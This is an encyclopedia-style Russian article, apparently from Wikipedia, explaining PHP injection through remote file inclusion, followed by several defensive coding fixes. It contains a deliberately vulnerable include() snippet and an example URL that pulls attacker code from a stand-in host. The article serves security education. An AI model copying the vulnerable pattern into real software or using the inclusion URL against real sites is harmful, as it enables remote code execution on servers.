PHP-инъекция () — один из способов взлома веб-сайтов, работающих на PHP, заключающийся в выполнении постороннего кода на серверной стороне.
Потенциально опасными функциями являются:
 eval(),
 preg_replace() (с модификатором «e»),
 require_once(),
 include_once(),
 include(),
 require(),
 create_function().
PHP-инъекция становится возможной, если входные параметры принимаются и используются без проверки.

Пример 
<?
...
$module = $_GET['module'];
include ($module.'.php');
...
?>
Этот скрипт уязвим, так как к содержимому переменной $module просто прибавляется «.php» и по полученному пути подключается файл.

Взломщик может на своём сайте создать файл, содержащий PHP-код (http://hackersite.com/inc.php), и зайдя на сайт по ссылке вроде
http://mysite.com/index.php?module=http://hackersite.com/inc
выполнить любые PHP-команды.

Способы защиты 
Существует несколько способов защиты от такой атаки:

 Проверять, не содержит ли переменная $module посторонние символы:
<?
...
$module = $_GET['module'];
if (strpbrk($module, '.?/:')) die('Blocked');
include $module. '.php';
...
?>
 Проверять, что $module присвоено одно из допустимых значений:
<?
...
$module = $_GET['module'];
$arr = array('main', 'about', 'links', 'forum');
if (!in_array($module,$arr)) $module = $arr[0];
include $module . '.php';
...
?>
Этот способ является более эффективным, красивым и аккуратным.
 Прописать каждое значение через if
<?
...
$module = $_GET['module'];
if ($module == 'main') include 'main.php';
if ($module == 'about') include 'about.php';
if ($module == 'links') include 'links.php';
if ($module == 'forum') include 'forum.php';
...
?>
 Использовать оператор switch:
<?
...
$module = $_GET['module'];
switch($module){
case 'about':
case 'links':
case 'forum': 
    include "{$module}.php"; break;
default: include 'main.php';
}
...
?>

Это решение аналогично решению с if, но имеет более компактную запись.

PHP предоставляет также возможность отключения использования удаленных файлов, это реализуется путём изменения значения опции allow_url_fopen  на Off в файле конфигурации сервера php.ini.

Описанная уязвимость представляет высокую опасность для сайта и авторам PHP-скриптов не надо забывать про неё.

См. также 
 Инъекция в хакерских атаках
 Инъекция SQL

Ссылки 
 Страница документации PHP, посвященная безопасности

Уязвимости защиты
PHP
Атаки и эксплойты
Информационная безопасность